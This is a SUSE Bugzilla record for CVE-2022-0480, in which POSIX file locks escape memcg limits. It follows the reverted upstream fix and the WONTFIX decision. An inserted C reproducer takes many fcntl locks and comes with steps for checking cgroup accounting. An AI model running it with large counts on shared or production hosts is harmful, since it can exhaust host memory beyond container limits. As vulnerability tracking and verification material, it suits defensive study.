Bug 1195487 (CVE-2022-0480)

Summary: VUL-0: CVE-2022-0480: kernel-source-azure,kernel-source,kernel-source-rt: memcg does not limit the number of POSIX file locks allowing memory exhaustion
Product: [Novell Products] SUSE Security Incidents
Reporter: Carlos López <carlos.lopez>
Component: Incidents
Assignee: Security Team bot <security-team>
Status: RESOLVED WONTFIX
QA Contact: Security Team bot <security-team>
Severity: Normal
Priority: P3 - Medium
CC: meissner, mhocko, mkoutny, smash_bz, tiwai, vbabka
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/322419/
See Also: https://bugzilla.suse.com/show_bug.cgi?id=1190115
          https://bugzilla.kernel.org/show_bug.cgi?id=216038
Whiteboard: CVSSv3.1:SUSE:CVE-2022-0480:6.2:(AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Description Carlos López 2022-02-03 09:50:12 UTC
rh#2049700

A flaw was found in the Linux kernel. A host memory exhaustion is possible because memcg does not limit the number of POSIX file locks.

References:
https://github.com/kata-containers/kata-containers/issues/3373
https://bugzilla.redhat.com/show_bug.cgi?id=2049700
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0480
Comment 1 Carlos López 2022-02-03 09:51:22 UTC
There is no real fix for this issue. The supposed fix [0] was reverted due to a performance regression [1], and as far as I can tell, this was never addressed again.

cve/linux-4.4 and older branches do not contain the intended fix, and newer branches contain the revert, so no branches are left in the intermediate state.

[0] https://github.com/torvalds/linux/commit/0f12156dff2862ac54235fc72703f18770769042
[1] https://github.com/torvalds/linux/commit/3754707bcc3e190e5dadc978d172b61e809cb3bd
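Added example, not from this bug report or from either linked commit: a bounded C reproducer for the mechanism the report describes. Each non-adjacent POSIX byte-range lock taken with fcntl(F_SETLK) is a separate kernel allocation for the lock record, and the report's point is that memcg does not account for those allocations, so a container can grow them past its memory limit. The function name take_posix_locks and the scratch-file path are assumptions of this example. The program takes a caller-chosen number of locks and reports how many it obtained; it deliberately does not loop until exhaustion.

```c
/* Added example for CVE-2022-0480 (not code from the bug report or kernel).
 * Takes N one-byte write locks on a scratch file, leaving a one-byte gap
 * between them so the kernel cannot merge neighbours into a single lock.
 * Each lock is its own kernel-side lock record; whether that memory is
 * charged to the caller's memcg is exactly what the CVE is about. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Returns the number of locks actually obtained: `count` on success, fewer
 * if fcntl() failed part-way, -1 if no scratch file could be created.
 * All locks are released when the descriptor is closed at the end. */
long take_posix_locks(long count)
{
    /* Scratch file path is an assumption; fall back to the cwd if /tmp
     * is not writable. The name is unlinked at once, only the fd matters. */
    char tmpl[] = "/tmp/cve-2022-0480-XXXXXX";
    int fd = mkstemp(tmpl);
    if (fd < 0) {
        strcpy(tmpl, "./cve-2022-0480-XXXXXX");
        fd = mkstemp(tmpl);
        if (fd < 0)
            return -1;
    }
    unlink(tmpl);

    long taken = 0;
    for (long i = 0; i < count; i++) {
        struct flock fl;
        memset(&fl, 0, sizeof fl);
        fl.l_type = F_WRLCK;      /* mkstemp opens O_RDWR, so F_WRLCK is allowed */
        fl.l_whence = SEEK_SET;
        fl.l_start = 2 * i;       /* bytes 0, 2, 4, ...: never adjacent */
        fl.l_len = 1;
        if (fcntl(fd, F_SETLK, &fl) < 0)
            break;                /* e.g. ENOLCK when the kernel refuses */
        taken++;
    }
    close(fd);                    /* drops every lock this process holds */
    return taken;
}

int main(int argc, char **argv)
{
    long want = argc > 1 ? strtol(argv[1], NULL, 10) : 100000;
    long got = take_posix_locks(want);
    if (got < 0) {
        perror("mkstemp");
        return 1;
    }
    printf("requested %ld POSIX locks, obtained %ld\n", want, got);
    return got == want ? 0 : 2;
}
```

To use it as a check rather than a stress test, run it from inside a cgroup v2 cgroup with memory.max set, and read that cgroup's memory.current before and after (with a large count, while the process is still holding the locks, e.g. by running it under a debugger or adding a pause before close). If memory.current does not move while the lock count does, the lock records are being allocated outside memcg accounting, which is the unfixed behaviour this bug tracks.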
Comment 3 Michal Koutný 2022-02-03 10:50:30 UTC
Carlos, we've gone through the whole patch-revert dance in SLES kernels, ending up with the reverts. For this particular case, see also bug 1190115, comment 6.

Let me check if there's anything new [1] that could justify this change against performance impact.

[1] BTW the Launchpad link [2] referenced from GH gives me kind of a 404.
[2] https://bugs.launchpad.net/katacontainers.io/+bug/1956283
Comment 7 Michal Koutný 2022-05-23 16:17:58 UTC
There's been no response to my reminder upstream.

In theory, this CVE bug could be rejected as invalid since there's no solution
in the upstream. Besides that I can see three options how to move the
underlying issue forward:
  1) attack security aspect,
  2) attack performance regression,
  3) find efficient solution.

Options 1) and 2) are pushing against each other (and 2) against Linus too), so
that's a bit of a stalemate.
No. 3) requires a more involved analysis of the performance regression; that's my
direction now.

(In reply to Michal Koutný from comment #5)
> I'll post an update by two weeks.
That didn't work out well last time. Bumping my internal priority.
Comment 8 Michal Koutný 2022-05-27 17:24:01 UTC
This bug has the status of a part-security, part-performance problem. Upstream prioritizes performance conservation, so there's no solution to the CVE currently.
I propose resolving this as WONTFIX from our PoV, i.e. I reassign the bug back to the sec team _without_ submitting anything to our kernels.

FTR, I've filed an upstream BZ [1] entry to track the problem there.

[1] https://bugzilla.kernel.org/show_bug.cgi?id=216038
Comment 9 Carlos López 2022-05-30 15:49:36 UTC
Closing as WONTFIX then. Feel free to reopen if there are any further developments upstream.